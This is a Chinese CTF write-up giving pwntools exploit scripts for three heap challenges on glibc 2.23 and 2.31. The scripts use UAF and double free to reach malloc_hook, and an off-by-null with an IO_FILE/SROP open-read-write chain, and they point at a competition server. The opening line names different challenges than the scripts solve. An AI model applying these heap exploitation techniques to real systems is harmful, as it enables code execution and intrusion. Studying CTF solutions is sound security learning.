把三个简单的做了：mipspwn 貌似是个栈溢出；repwn 需要逆向那个算法，然后 leak stack 地址和 libc 地址；server 是个用 GET/POST 传参的菜单堆，有 UAF 洞。附件
sign_in
简单的 UAF：用一个 double free 打到 malloc_hook，然后靠 realloc 调整栈
1 | from pwn import* |
2 | context.log_level = 'DEBUG'  # pwntools echoes every byte sent/received; handy while debugging, noisy otherwise |
3 | def menu(ch):  # select menu entry ch once the 'choice :' prompt has been read |
4 | p.sendlineafter('choice :',str(ch)) |
5 | def new(size,name,content):  # menu 1: size, then name, then content, each after its prompt |
6 | menu(1) |
7 | p.sendlineafter("game's name:",str(size))  # NOTE: size is sent at a prompt whose text is also "game's name:" — matches this binary's prompt order, verify before reuse |
8 | p.sendafter("game's name:",name)  # name is sent raw (no newline) so its trailing bytes are exactly what is given |
9 | p.sendlineafter("game's message:",content) |
10 | def free(index):  # menu 3: delete the entry at index |
11 | menu(3) |
12 | p.sendlineafter('index:',str(index)) |
13 | def show():  # menu 2: print entries (no index argument in this binary) |
14 | menu(2) |
15 | |
16 | |
17 | p = process('./main')  # sign_in solve script; local run, the remote() line below is the commented-out alternative |
18 | #p = remote('183.129.189.60',10029) |
19 | libc = ELF('./libc-2.23.so')  # every libc.sym[...] value below comes from this exact build |
20 | new(0x100,'FMYY','FMYY') |
21 | new(0x68,'FMYY','FMYY') |
22 | new(0x68,'FMYY','FMYY') |
23 | free(0) |
24 | new(0xD0,'\x78','\x78') |
25 | show() |
26 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 88 - 0x10  # reads a 6-byte pointer back from show(); the 88/0x10 correction is specific to this libc-2.23 build |
27 | log.info('LIBC:\t' + hex(libc_base)) |
28 | malloc_hook = libc_base + libc.sym['__malloc_hook'] |
29 | rce = libc_base + 0xF1207  # hard-coded offset into this libc build only; it must be recomputed for any other build |
30 | realloc = libc_base + libc.sym['realloc'] |
31 | free(1) |
32 | free(2) |
33 | free(1) |
34 | new(0x68,p64(malloc_hook - 0x23),'FMYY') |
35 | new(0x68,'FMYY','FMYY') |
36 | new(0x68,'FMYY','FMYY') |
37 | new(0x68,'\x00'*(0x13-8) + p64(rce) + p64(realloc + 4),'FMYY') |
38 | menu(1) |
39 | p.interactive() |
easy_heap
简单的 off-by-null（libc 2.31），但开了沙盒，用 malloc_hook + IO + SROP 的劫持方法做即可，orw 读出 flag
1 | from pwn import* |
2 | context.arch = 'AMD64'  # presumably needed so SigreturnFrame() later builds an x86-64 frame — verify |
3 | #context.log_level = 'DEBUG' |
4 | def menu(ch):  # select menu entry ch once the 'Choice:' prompt has been read |
5 | p.sendlineafter('Choice:',str(ch)) |
6 | def new(size):  # menu 1: allocate an entry of the given size |
7 | menu(1) |
8 | p.sendlineafter('Size: ',str(size)) |
9 | def edit(index,content):  # menu 2: overwrite entry index with content (sent raw, no newline) |
10 | menu(2) |
11 | p.sendlineafter('Index:',str(index)) |
12 | p.sendafter('Content:',content) |
13 | def free(index):  # menu 3: delete the entry at index |
14 | menu(3) |
15 | p.sendlineafter('Index:',str(index)) |
16 | def show(index):  # menu 4: print the entry at index |
17 | menu(4) |
18 | p.sendlineafter('Index:',str(index)) |
19 | p = process('./main')  # easy_heap solve script; this local process is spawned and then immediately replaced by the remote() on the next line, so it is left running and never closed — keep only one of the two |
20 | p = remote('183.129.189.60',10009) |
21 | libc =ELF('./libc-2.31.so')  # every libc.sym[...] value below comes from this exact build |
22 | for i in range(4): |
23 | new(0x1000) |
24 | new(0x1000-0x3E0 - 0x50 + 0x10) |
25 | #--large bin |
26 | for i in range(7): |
27 | new(0x28) |
28 | new(0xB20) |
29 | new(0x10) |
30 | |
31 | free(12) |
32 | new(0x1000) |
33 | new(0x28) #14 |
34 | edit(14,p64(0) + p64(0x521) + '\x40') |
35 | #-- |
36 | #-- small bin |
37 | new(0x28) #15 |
38 | new(0x28) #16 |
39 | new(0x28) #17 |
40 | new(0x28) #18 |
41 | |
42 | for i in range(7): #5 - 11 |
43 | free(5+i) |
44 | |
45 | free(17) |
46 | free(15) |
47 | |
48 | for i in range(7): |
49 | new(0x28) |
50 | |
51 | new(0x400) #15 |
52 | |
53 | new(0x28) #17 |
54 | edit(17,p64(0) + '\x20') |
55 | new(0x28) # clear the tcache bin |
56 | #-- |
57 | |
58 | #--fast bin |
59 | for i in range(7): |
60 | free(5 + i) |
61 | free(16) |
62 | free(14) |
63 | for i in range(7): |
64 | new(0x28) |
65 | new(0x28) |
66 | edit(14,'\x20') |
67 | new(0x28) |
68 | #-- |
69 | new(0x28) #20 |
70 | new(0x5F8) |
71 | free(20) |
72 | new(0x28) |
73 | edit(20,'\x00'*0x20 + p64(0x520)) |
74 | free(21) |
75 | new(0x40) |
76 | new(0x40) |
77 | show(16) |
78 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 -0x10 - libc.sym['__malloc_hook']  # reads a 6-byte pointer back from show(); the 0x60/0x10 correction is specific to this libc-2.31 build |
79 | log.info('LIBC:\t' + hex(libc_base)) |
80 | free_hook = libc_base + libc.sym['__free_hook']  # re-assigned to the same value as `address` further down |
81 | system = libc_base + libc.sym['system']  # unused in this script |
82 | IO_stdin = libc_base + libc.sym['_IO_2_1_stdin_'] |
83 | free(22) |
84 | free(14) |
85 | new(0x28) |
86 | edit(14,p64(0) + p64(0x301)) |
87 | new(0x2F0) |
88 | free(22) |
89 | free(21) |
90 | free(14) |
91 | new(0x28) |
92 | edit(14,'\x00'*0x10 + p64(IO_stdin)) |
93 | ################ |
94 | pop_rdi_ret = libc_base + 0x0000000000026B72  # gadget offsets here and below are hard-coded for this libc-2.31 build only |
95 | pop_rdx_r12 = libc_base + 0x000000000011C1E1 |
96 | pop_rsi_ret = libc_base + 0x0000000000027529 |
97 | pop_rax_ret = libc_base + 0x000000000004A550  # unused in this script |
98 | jmp_rsi = libc_base + 0x00000000001105BD  # unused in this script |
99 | |
100 | |
101 | syscall = libc_base + libc.sym['syscall']  # unused in this script |
102 | |
103 | target = libc_base + libc.sym['_IO_2_1_stdin_']  # same value as IO_stdin above |
104 | address = libc.sym['__free_hook'] + libc_base  # same value as free_hook above |
105 | IO_str_jumps = libc_base + 0x1ED560  # hard-coded offset for this libc-2.31 build only |
106 | frame_address = target + 0xE0 |
107 | |
108 | Open = libc_base + libc.symbols["open"] |
109 | Read = libc_base + libc.symbols["read"] |
110 | Puts = libc_base + libc.symbols['puts'] |
111 | free_hook = address  # redundant: free_hook already holds this value |
112 | IO = '\x00'*0x28 |
113 | IO += p64(frame_address) |
114 | IO = IO.ljust(0xD8,'\x00') |
115 | IO += p64(IO_str_jumps) |
116 | read = libc_base + libc.sym['read']  # unused; the chain below uses Read |
117 | frame = SigreturnFrame()  # relies on context.arch set at the top of the script |
118 | frame.rax = 0 |
119 | frame.rdi = 0 |
120 | frame.rsi = address |
121 | frame.rdx = 0x2000 |
122 | frame.rsp = address |
123 | frame.rip = Read |
124 | |
125 | |
126 | orw = p64(pop_rdi_ret)+p64(free_hook + 0xF8) |
127 | orw += p64(pop_rsi_ret)+p64(0) |
128 | orw += p64(Open) |
129 | orw += p64(pop_rdi_ret) + p64(3) |
130 | orw += p64(pop_rdx_r12) + p64(0x30) + p64(0) |
131 | orw += p64(pop_rsi_ret) + p64(free_hook+0x100) |
132 | orw += p64(Read) |
133 | orw += p64(pop_rdi_ret)+p64(free_hook+0x100) |
134 | orw += p64(Puts) |
135 | orw = orw.ljust(0xF8,'\x00')  # pads to the 0xF8 offset that line 126 points at |
136 | orw += './flag\x00\x00' |
137 | IO += str(frame) |
138 | IO += 'F'*0x18 + p64(libc_base + libc.sym['setcontext'] + 61)  # the +61 is a build-specific entry offset into setcontext |
139 | ############### |
140 | new(0x2F0) |
141 | new(0x2F0) |
142 | log.success('Now') |
143 | edit(22,IO) |
144 | menu(5) |
145 | p.sendlineafter('bye bye!',orw) |
146 | p.interactive() |
babypwn
也是简单题。需要一个 libc 地址：先释放一个块到 fastbin，利用 scanf 输入数据过多时会申请一个 large bin chunk 的特性，可以把 fastbin 中的 chunk 放进 small bin，再申请回来即可拿到 libc；之后用一个 double free 申请过去即可打到 malloc_hook
1 | from pwn import* |
2 | context.log_level = 'DEBUG'  # pwntools echoes every byte sent/received; handy while debugging, noisy otherwise |
3 | def menu(ch):  # select menu entry ch once the 'choice :' prompt has been read |
4 | p.sendlineafter('choice :',str(ch)) |
5 | def new(size,name,content,sign=1):  # menu 1: size, then name, then content; sign=0 sends content without waiting for the message prompt |
6 | menu(1) |
7 | p.sendlineafter("game's name:",str(size))  # NOTE: size is sent at a prompt whose text is also "game's name:" — matches this binary's prompt order, verify before reuse |
8 | p.sendafter("game's name:",name)  # name is sent raw (no newline) |
9 | if sign: |
10 | p.sendlineafter("game's message:",content) |
11 | else: |
12 | p.sendline(content)  # used once below, where the binary does not print the message prompt |
13 | def free(index):  # menu 2: delete the entry at index (this binary's numbering differs from sign_in's) |
14 | menu(2) |
15 | p.sendlineafter('index:',str(index)) |
16 | |
17 | p = process('./main')  # babypwn solve script; this local process is spawned and then immediately replaced by the remote() on the next line, so it is left running and never closed — keep only one of the two |
18 | p = remote('183.129.189.60',10031) |
19 | libc =ELF('./libc-2.23.so')  # every libc.sym[...] value below comes from this exact build |
20 | new(0x28,'FMYY','FMYY') |
21 | new(0x60,'FMYY','FMYY') |
22 | new(0x60,'FMYY','FMYY') |
23 | new(0x60,'FMYY','FMYY') |
24 | free(2) |
25 | menu(1) |
26 | p.sendlineafter("game's name:",'0'*0x500)  # over-long input at the size prompt; see the write-up paragraph above for why this is done |
27 | free(0) |
28 | new(0x60,'\xDD\x25','FMYY') |
29 | free(1) |
30 | free(3) |
31 | free(1) |
32 | new(0x60,'\x30','FMYY') |
33 | new(0x60,'FMYY','FMYY') |
34 | new(0x60,'FMYY','FMYY') |
35 | new(0x60,'FMYY','FMYY') |
36 | new(0x60,'\x00'*0x33 + p64(0xFBAD1800) + p64(0)*3 + '\x88','FMYY',sign=0)  # sign=0: content is sent without waiting for the message prompt |
37 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdin_']  # reads a 6-byte pointer from the output; offset assumes this libc-2.23 build |
38 | malloc_hook = libc_base + libc.sym['__malloc_hook'] |
39 | realloc = libc_base + libc.sym['realloc'] |
40 | rce = libc_base + 0xF1207  # hard-coded offset into this libc build only; it must be recomputed for any other build |
41 | free(5) |
42 | free(6) |
43 | free(5) |
44 | new(0x68,p64(malloc_hook - 0x23),'FMYY') |
45 | new(0x68,'FMYY','FMYY') |
46 | new(0x68,'FMYY','FMYY') |
47 | new(0x68,'\x00'*(0x13-8) + p64(rce) + p64(realloc + 4),'FMYY') |
48 | menu(1) |
49 | p.interactive() |